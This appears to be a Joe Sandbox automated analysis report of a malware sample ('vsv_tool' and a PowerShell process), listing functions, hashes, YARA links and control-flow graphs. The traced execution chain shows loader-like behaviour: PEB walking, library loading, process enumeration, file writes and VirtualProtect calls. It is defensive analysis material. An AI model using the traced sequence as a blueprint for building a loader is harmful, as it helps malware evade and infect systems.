                                                                                                                                                                                              • Instruction Fuzzy Hash: D8A147B27043168FCB254B6D941466ABBADAFC2219B1484AAD645CF352DB31CC45C7A1
                                                                                                                                                                                              Function 079F3D70 Relevance: 9.2, Strings: 7, Instructions: 429COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$d5k
                                                                                                                                                                                              • API String ID: 0-1956149427
                                                                                                                                                                                              • Opcode ID: 4151f1d39543a9e6d43763ed6834cee9b4c3a4d547ddb34848c287a133884432
                                                                                                                                                                                              • Instruction ID: 5a292d8e7e67b434e90ba78d13d01cd1217b6ad314834e5df42250b25bfd749c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4151f1d39543a9e6d43763ed6834cee9b4c3a4d547ddb34848c287a133884432
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27E14AB1B04246CFCB14DB6C88046ABBBF6AF95218B28C4BAD605CF365DB35CC45C791
                                                                                                                                                                                              Function 079F14E8 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                              • API String ID: 0-3272787073
                                                                                                                                                                                              • Opcode ID: 088168b38ad78afeada60e4e0005d2c9e3388ac5f516a94af1c626b06fff8bf9
                                                                                                                                                                                              • Instruction ID: b6dc9031ca1b63f9b3f906ad33014bcb7fee73dbabbac2e42c9e10d45e1af8c0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 088168b38ad78afeada60e4e0005d2c9e3388ac5f516a94af1c626b06fff8bf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C516FB1B8434ECFCB255B6D8410766BBB9AFC2218F18847BD606CB351DA31C885C7D1
                                                                                                                                                                                              Function 079F3518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                                                              • Opcode ID: 3b671967b8f33ecdead077fcf478abe1054ad4ff20a640108480116e7311c32b
                                                                                                                                                                                              • Instruction ID: c0d216f3debfbf33a19743d79fbcc0edbc5c7ab76aaa8d88b2825a5efb184f1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b671967b8f33ecdead077fcf478abe1054ad4ff20a640108480116e7311c32b
                                                                                                                                                                                              • Instruction Fuzzy Hash: E82136B171430A5BDB38597E9801B27BEDA9BC171DF24883AA60DCF385DE7AD844C361
                                                                                                                                                                                              Function 079F0570 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                              • Opcode ID: 49fd95d04c75a78cec71caa404939cc4de60565f234755ae243f702e97484f8d
                                                                                                                                                                                              • Instruction ID: 312f9605c60767e3e8a6dc50025daf8c0c36e25b75a23567f06bbc49b7dd3861
                                                                                                                                                                                              • Opcode Fuzzy Hash: 49fd95d04c75a78cec71caa404939cc4de60565f234755ae243f702e97484f8d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101F261B0E3854FC72A522D08301156FB65B9390431E04DBC182DF39BCCA98C498393

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:20.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:147
                                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                                              execution_graph 2570 8c656b 2573 8c590b 2570->2573 2574 8c5974 2573->2574 2630 8c48bb 2574->2630 2576 8c59a9 2577 8c48bb GetPEB 2576->2577 2578 8c59c0 2577->2578 2633 8c518b 2578->2633 2580 8c5c38 2636 8c43db 2580->2636 2582 8c5c55 2639 8c46fb 2582->2639 2584 8c5c72 2585 8c518b GlobalAlloc 2584->2585 2586 8c5d7a 2585->2586 2643 8c436b 2586->2643 2588 8c5d97 2589 8c46fb 2 API calls 2588->2589 2590 8c5daa 2589->2590 2646 8c51eb 2590->2646 2592 8c5e22 2653 8c445b 2592->2653 2594 8c5efe 2656 8c4acb CreateFileW 2594->2656 2596 8c5f20 2662 8c53eb 2596->2662 2598 8c5f60 2599 8c606e 2598->2599 2600 8c601a 2598->2600 2602 8c60a6 2599->2602 2603 8c6076 2599->2603 2666 8c559b 2600->2666 2604 8c518b GlobalAlloc 2602->2604 2672 8c456b 2603->2672 2608 8c60b3 2604->2608 2605 8c6066 2609 8c6336 2605->2609 2611 8c6385 2605->2611 2695 8c3d5b 2605->2695 2610 8c518b GlobalAlloc 2608->2610 2612 8c6131 2610->2612 2611->2609 2613 8c518b GlobalAlloc 2611->2613 2676 8c44ab 2612->2676 2615 8c6432 2613->2615 2617 8c46fb 2 API calls 2615->2617 2616 8c6183 2619 8c518b GlobalAlloc 2616->2619 2622 8c629b 2616->2622 2618 8c6469 2617->2618 2621 8c518b GlobalAlloc 2618->2621 2628 8c61de 2619->2628 2623 8c64a6 2621->2623 2622->2605 2691 8c3b5b 2622->2691 2624 8c64c3 VirtualProtect 2623->2624 2670 8c4a7b 2624->2670 2628->2622 2681 8c3eab 2628->2681 2684 8c56cb 2628->2684 2698 8c58bb GetPEB 2630->2698 2632 8c48db 2632->2576 2634 8c519b 2633->2634 2635 8c51a7 GlobalAlloc 2633->2635 2634->2635 2635->2580 2637 8c518b GlobalAlloc 2636->2637 2638 8c43ea 2637->2638 2638->2582 2640 8c518b GlobalAlloc 2639->2640 2641 8c470c 2640->2641 2642 8c471f LoadLibraryW 2641->2642 2642->2584 2644 8c518b GlobalAlloc 2643->2644 2645 8c437a 2644->2645 2645->2588 2648 8c5200 2646->2648 2647 8c518b GlobalAlloc 2647->2648 2648->2647 2649 8c5226 2648->2649 2650 8c5238 NtQuerySystemInformation 2648->2650 2649->2592 2650->2648 2651 8c5264 2650->2651 2652 8c518b GlobalAlloc 2651->2652 2652->2649 2654 8c518b GlobalAlloc 2653->2654 2655 8c4469 2654->2655 2655->2594 2657 8c4aff 2656->2657 2661 8c4af8 2656->2661 2658 8c518b GlobalAlloc 2657->2658 2657->2661 2659 8c4b3b ReadFile 2658->2659 2660 8c4b76 CloseHandle 2659->2660 2659->2661 2660->2661 2661->2596 2663 8c53fc 2662->2663 2664 8c46fb 2 API calls 2663->2664 2665 8c54d1 2664->2665 2665->2598 2667 8c55be 2666->2667 2668 8c5653 2667->2668 2669 8c56cb 4 API calls 2667->2669 2668->2605 2669->2667 2671 8c4a87 VirtualProtect 2670->2671 2671->2609 2674 8c458e 2672->2674 2673 8c45dc 2673->2605 2674->2673 2675 8c3b5b GlobalAlloc 2674->2675 2675->2674 2677 8c518b GlobalAlloc 2676->2677 2678 8c44bc 2677->2678 2679 8c518b GlobalAlloc 2678->2679 2680 8c44de 2679->2680 2680->2616 2699 8c40fb 2681->2699 2683 8c3ef0 2683->2628 2685 8c44ab GlobalAlloc 2684->2685 2686 8c56da 2685->2686 2705 8c50bb CreateFileW 2686->2705 2690 8c56ff 2690->2628 2692 8c3b85 2691->2692 2693 8c3b8c 2691->2693 2692->2605 2693->2692 2694 8c518b GlobalAlloc 2693->2694 2694->2693 2696 8c518b GlobalAlloc 2695->2696 2697 8c3d6e 2696->2697 2697->2611 2698->2632 2700 8c410a 2699->2700 2701 8c518b GlobalAlloc 2700->2701 2704 8c4116 2700->2704 2702 8c4201 2701->2702 2703 8c518b GlobalAlloc 2702->2703 2703->2704 2704->2683 2706 8c50ec WriteFile 2705->2706 2707 8c50e8 2705->2707 2706->2707 2707->2690 2708 8c671b 2707->2708 2709 8c672c 2708->2709 2710 8c67bf malloc 2709->2710 2711 8c676b 2709->2711 2710->2711 2711->2690 2731 8c461b 2736 8c3e6b 2731->2736 2733 8c4633 2734 8c4acb 4 API calls 2733->2734 2735 8c465b 2734->2735 2737 8c518b GlobalAlloc 2736->2737 2738 8c3e79 2737->2738 2738->2733 2712 8c62a1 2719 8c61f1 2712->2719 2713 8c629b 2715 8c632c 2713->2715 2716 8c3b5b GlobalAlloc 2713->2716 2714 8c3eab GlobalAlloc 2714->2719 2717 8c3d5b GlobalAlloc 2715->2717 2718 8c6336 2715->2718 2720 8c6385 2715->2720 2716->2715 2717->2720 2719->2713 2719->2714 2721 8c56cb 4 API calls 2719->2721 2720->2718 2722 8c518b GlobalAlloc 2720->2722 2721->2719 2723 8c6432 2722->2723 2724 8c46fb 2 API calls 2723->2724 2725 8c6469 2724->2725 2726 8c518b GlobalAlloc 2725->2726 2727 8c64a6 2726->2727 2728 8c64c3 VirtualProtect 2727->2728 2729 8c4a7b 2728->2729 2730 8c6500 VirtualProtect 2729->2730 2730->2718 2739 8c3b43 2740 8c3b8c 2739->2740 2741 8c3b85 2739->2741 2740->2741 2742 8c518b GlobalAlloc 2740->2742 2742->2740

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 008C51EB Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 217 8c51eb-8c51f9 218 8c5200-8c5207 217->218 219 8c520d-8c5224 call 8c518b 218->219 220 8c5352-8c5356 218->220 223 8c522b-8c5258 call 8c4bfb NtQuerySystemInformation 219->223 224 8c5226 219->224 227 8c525a-8c5262 223->227 228 8c5264-8c5281 call 8c518b 223->228 224->220 227->218 231 8c5284-8c528a 228->231 232 8c534b 231->232 233 8c5290-8c5297 231->233 232->220 234 8c529d-8c52bd call 8c4bfb 233->234 235 8c533b-8c5346 233->235 238 8c52c8-8c52ce 234->238 235->231 239 8c52f4-8c5320 call 8c4fbb call 8c483b 238->239 240 8c52d0-8c52dc 238->240 247 8c532a-8c5333 239->247 248 8c5322-8c5328 239->248 240->239 241 8c52de-8c52f2 240->241 241->238 247->235 249 8c5335-8c5338 247->249 248->235 249->235
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 008C518B: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008C51BB
                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 008C524F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocGlobalInformationQuerySystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3737350999-0
                                                                                                                                                                                              • Opcode ID: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                                                                              • Instruction ID: 4e0ff44ef22562ed5079d87af0bcbf7140b783d8bcf5a82aa93b93593ab276ed
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b7043f871755b58f40638a0e80aec111520236eadfc74e0803d840394cff95c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B51D3B5900609EBCF04CF98C890FEEBBB5FB49304F648159E915AB340D775EA81CBA1
                                                                                                                                                                                              Function 008C4ACB Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 008C4AED
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                                                                              • Instruction ID: 6dfc0385ffcdd77695777b7454b37a924893cfa34c38bc77be1ffe8b47844ae9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 811ed88586e1a9313cd571564231c22e97687d35a065f62fc27905b3f91c6921
                                                                                                                                                                                              • Instruction Fuzzy Hash: D531B975A00108FFCB14DF98C891F9EB7B9FF48314F209199E918AB291D631EE41DB94
                                                                                                                                                                                              Function 008C590B Relevance: 4.0, APIs: 2, Instructions: 995memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 13 8c590b-8c5e2b call 8c535b call 8c48bb * 2 call 8c477b * 18 call 8c518b call 8c43db call 8c46fb call 8c477b * 8 call 8c518b call 8c436b call 8c46fb call 8c477b * 3 call 8c51eb 93 8c5e2d-8c5e34 13->93 94 8c5e5b-8c5fa1 call 8c477b * 3 call 8c445b call 8c4acb call 8c477b call 8c53eb 13->94 95 8c5e3f-8c5e43 93->95 115 8c5fa9-8c5fb4 94->115 116 8c5fa3-8c5fa7 94->116 95->94 96 8c5e45-8c5e59 call 8c4f4b 95->96 96->95 117 8c5fba-8c6018 115->117 118 8c5fb6 115->118 116->117 119 8c606e-8c6074 117->119 120 8c601a-8c6061 call 8c559b 117->120 118->117 122 8c60a6-8c60e1 call 8c518b call 8c4a7b 119->122 123 8c6076-8c60a1 call 8c456b 119->123 125 8c6066-8c6069 120->125 136 8c60eb-8c60f1 122->136 129 8c633b-8c634f 123->129 125->129 131 8c6396-8c63a2 129->131 132 8c6351-8c638d call 8c3d5b 129->132 135 8c63a5-8c63c8 call 8c4a1b 131->135 141 8c638f 132->141 142 8c6394 132->142 146 8c63d9-8c6555 call 8c466b call 8c518b call 8c4c7b call 8c506b call 8c46fb call 8c58db call 8c518b call 8c4a7b VirtualProtect call 8c4a7b VirtualProtect 135->146 147 8c63ca-8c63d3 135->147 139 8c6120-8c6137 call 8c518b 136->139 140 8c60f3-8c611e 136->140 151 8c613e-8c6149 139->151 140->136 144 8c655f-8c6562 141->144 142->135 199 8c655c 146->199 147->146 153 8c616a-8c61cd call 8c44ab call 8c483b call 8c426b 151->153 154 8c614b-8c6168 151->154 167 8c630b-8c6311 153->167 168 8c61d3-8c61e7 call 8c518b 153->168 154->151 167->129 172 8c6313-8c6334 call 8c3b5b 167->172 177 8c61f1-8c61f8 168->177 172->129 179 8c6336 172->179 180 8c61fe-8c6225 call 8c428b 177->180 181 8c62e5-8c6308 call 8c427b 177->181 179->144 189 8c6247-8c626c call 8c3eab 180->189 190 8c6227-8c6245 call 8c4f4b 180->190 181->167 197 8c626e 189->197 198 8c6270-8c627b 189->198 190->177 197->177 200 8c627d-8c6299 call 8c473b 198->200 201 8c62e0 198->201 199->144 204 8c629b-8c629f 200->204 205 8c62a3-8c62dc call 8c56cb 200->205 201->177 204->181 205->201 208 8c62de 205->208 208->181 208->201
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 008C518B: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008C51BB
                                                                                                                                                                                                • Part of subcall function 008C46FB: LoadLibraryW.KERNELBASE(?), ref: 008C472C
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 008C64E0
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 008C6513
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2510009449-0
                                                                                                                                                                                              • Opcode ID: 6f855ac0dc007a96ac5ff6498043683a25666386f6528fbe4cf83af6e58889b1
                                                                                                                                                                                              • Instruction ID: 3cd8da7399414f8065849d7ae8cb430d96be3085d44520afc3b34dc1f29399e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f855ac0dc007a96ac5ff6498043683a25666386f6528fbe4cf83af6e58889b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: E692A7B5E00118AFCB14DB98C991FEEB7B5BF88304F2481ADE509A7345E731AA45CF51
                                                                                                                                                                                              Function 008C50BB Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 209 8c50bb-8c50e6 CreateFileW 210 8c50ec-8c510f WriteFile 209->210 211 8c50e8-8c50ea 209->211 213 8c5121-8c512d 210->213 214 8c5111-8c511f 210->214 212 8c512f-8c5132 211->212 213->212 214->212
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 008C50DD
                                                                                                                                                                                              • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 008C510B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CreateWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2263783195-0
                                                                                                                                                                                              • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                              • Instruction ID: 7acc83cffc9985e944b01aa85067c8d11e3ae027c4c77c9a59dcfc4286ca27cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13011E74640508BBCF10DE58DC45F9A73B9EF48314F208159E919DB280D631EE42DB90
                                                                                                                                                                                              Function 008C46FB Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 250 8c46fb-8c4737 call 8c518b call 8c4ccb LoadLibraryW
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 008C518B: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008C51BB
                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 008C472C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocGlobalLibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3361179946-0
                                                                                                                                                                                              • Opcode ID: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                                                                              • Instruction ID: afbedb7d7931fdae07e01a1d82c045a15cbc7dfd915bb04fd0b2bd3613dea762
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAE0ED75E00208BFCB00EFA8DD82E9D7BB8AF48201F108198F908D7344E631EF518B91
                                                                                                                                                                                              Function 008C671B Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 255 8c671b-8c6769 call 8c4bfb 260 8c676b-8c676d 255->260 261 8c6772-8c67aa 255->261 262 8c694e-8c6951 260->262 265 8c67ac-8c67ba 261->265 266 8c67bf-8c67eb malloc 261->266 265->262 267 8c67f6-8c67fc 266->267 269 8c687c-8c6880 267->269 270 8c67fe-8c6805 267->270 271 8c68a4-8c68bb call 8c57eb 269->271 272 8c6882-8c689f 269->272 273 8c6810-8c6816 270->273 281 8c68dc-8c6908 271->281 282 8c68bd-8c68da 271->282 272->262 275 8c6818-8c6832 273->275 276 8c6877 273->276 280 8c6837-8c6875 call 8c658b 275->280 276->267 280->273 284 8c6913-8c691b 281->284 282->262 287 8c691d-8c693e 284->287 288 8c6940-8c6947 284->288 287->284 293 8c694c 288->293 293->262
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                              • Instruction ID: 9a186fef0d5373968e925b7e9ec30890ec58e96f533296b61a879f3aca7ec860
                                                                                                                                                                                              • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F91D5B5D04209AFCB08CF98D880EEEBBB5FF88314F148558E519AB355D734AA55CFA0
                                                                                                                                                                                              Function 008C518B Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 317 8c518b-8c5199 318 8c519b-8c51a4 317->318 319 8c51a7-8c51c0 GlobalAlloc 317->319 318->319
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008C51BB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.00000000008C3000.00000020.00000001.01000000.0000000E.sdmp, Offset: 008C3000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_8c3000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                                                              • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                              • Instruction ID: ea9907e9613157a16d9b58034ee0ef8aee19a713989cf9ea1f2022f191570979
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F02278614208EFDB44DF58D584E99B7B5FB88364F10C299AC198B341D631EE81DB94
                                                                                                                                                                                              Function 0055CA28 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 337 55ca28-55ca5d 338 55ca63-55ca6f call 55c7b8 337->338 341 55ca71-55ca8d 338->341 342 55ca92-55ca9a 338->342 341->342 343 55caa5-55caba 342->343 344 55ca9c-55caa0 call 55d27c 342->344 344->343
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.000000000055C000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0055C000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_55c000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fca083f793e2f52c573093bdb67ff2101cadd38cefebfabfc2ea3ea0026478a4
                                                                                                                                                                                              • Instruction ID: 36727aa3cf92e8af3c8dea8a210c7c65a6806bd15df48620c79ff90e52873044
                                                                                                                                                                                              • Opcode Fuzzy Hash: fca083f793e2f52c573093bdb67ff2101cadd38cefebfabfc2ea3ea0026478a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A018071210209AFDB50EF68DD96A5A3FECFB49300B4048A5FD04C7692EA70EC059B60
                                                                                                                                                                                              Function 0055C9F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 364 55c9f0-55c9fd call 55c7b8 367 55ca12-55ca19 364->367 368 55c9ff-55ca03 364->368 370 55ca22-55ca24 367->370 368->367 369 55ca05-55ca0c call 55c98c 368->369 369->367
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.000000000055C000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0055C000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_55c000_vsv_tool.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ee07f5023dc0d96b754cc0171f9b2c7b07269112c1f717584af23fed1d3b5a05
                                                                                                                                                                                              • Instruction ID: 02317db02079f6b65a9becb33c2ff036a2e2482fe747b6c3b12af03399dbb114
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee07f5023dc0d96b754cc0171f9b2c7b07269112c1f717584af23fed1d3b5a05
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DD017607113040ECBA4BA7D8DD6A4A0ED8AB49386F80147B7844D7243E664C84C5710
                                                                                                                                                                                              Function 0055C7C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 376 55c7c0-55c7c4 377 55c7c6 call 55ca28 376->377 378 55c7cb 376->378 377->378
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.2969664423.000000000055C000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0055C000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
